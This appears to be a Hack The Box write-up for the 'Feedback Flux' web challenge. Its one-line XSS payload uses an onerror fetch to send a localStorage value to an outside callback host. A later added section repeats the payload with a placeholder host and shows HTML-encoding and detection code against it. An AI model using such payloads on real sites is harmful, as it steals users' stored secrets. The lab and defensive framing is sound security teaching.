https://app.hackthebox.com/challenges/782

Description

You’re a member of fsociety tasked with infiltrating E Corp’s Feedback Flux system. There’s a vulnerability hidden deep within their feedback platform, and it’s your job to find and exploit it.

Exploitation

Use a webhook like https://app.interactsh.com/#/

Get your URL

Just read ./challenge/app/Jobs/AdminBot.php

<?xml ><img src=x onerror="fetch('https://ozyttdpkujcaljzpqpymyaliclaef8wya.oast.fun?x=' + localStorage.getItem('flag'));"> ?>
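The defensive counterpart to the payload above, added here as an example and not taken from the challenge or its source: the reason the `onerror` handler fires is that user-supplied feedback reaches the page as raw HTML. Output-encoding the five HTML metacharacters before rendering turns the same string into inert text, and a separate detection check can raise an alert when a submission carries tag-plus-event-handler markup. The webhook host is a placeholder; `escapeHtml`, `isInert` and `detectEventHandlerMarkup` are names chosen for this example.

```javascript
// Added example (not part of the writeup): output encoding and a detection signal
// for the feedback text that the admin bot renders. Constructed sample input below.

// The writeup's payload shape, with the webhook host replaced by a placeholder.
const PAYLOAD =
  '<?xml ><img src=x onerror="fetch(\'https://WEBHOOK-PLACEHOLDER/?x=\' + ' +
  'localStorage.getItem(\'flag\'));"> ?>';

// Encode the characters that let text break out of an HTML text context.
// This is the standard output-encoding step a template engine should apply
// to untrusted feedback before it is inserted into the page.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// After encoding, the string must contain no raw tag delimiters or quotes,
// so the browser renders it as text instead of parsing an <img> element.
function isInert(html) {
  return !/[<>"']/.test(html);
}

// Detection signal for logging/alerting, not a sanitizer: a tag that carries
// an on*= event-handler attribute in submitted feedback.
function detectEventHandlerMarkup(text) {
  return /<[^>]*\son[a-z]+\s*=/i.test(text);
}

// Constructed submissions as they might arrive at the feedback endpoint.
const SAMPLE_SUBMISSIONS = [
  'Great service, thanks!',
  PAYLOAD,
];

function reviewSubmissions(submissions) {
  return submissions.map((text) => ({
    rendered: escapeHtml(text),   // what the admin bot's page should show
    inert: isInert(escapeHtml(text)),
    flagged: detectEventHandlerMarkup(text),
  }));
}

// Example run: the payload renders as harmless text and is flagged for review.
console.log(reviewSubmissions(SAMPLE_SUBMISSIONS));
```

Anything stored in `localStorage` is readable by any script running on that origin, which is exactly why the payload above can read the flag; the encoding step removes the script, and the detection check gives the operator a log line to investigate when someone tries.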

Summary

Feedback Flux: use the client-side injection (the XSS payload above) to exfiltrate the flag from localStorage to your webhook and recover it from the callback.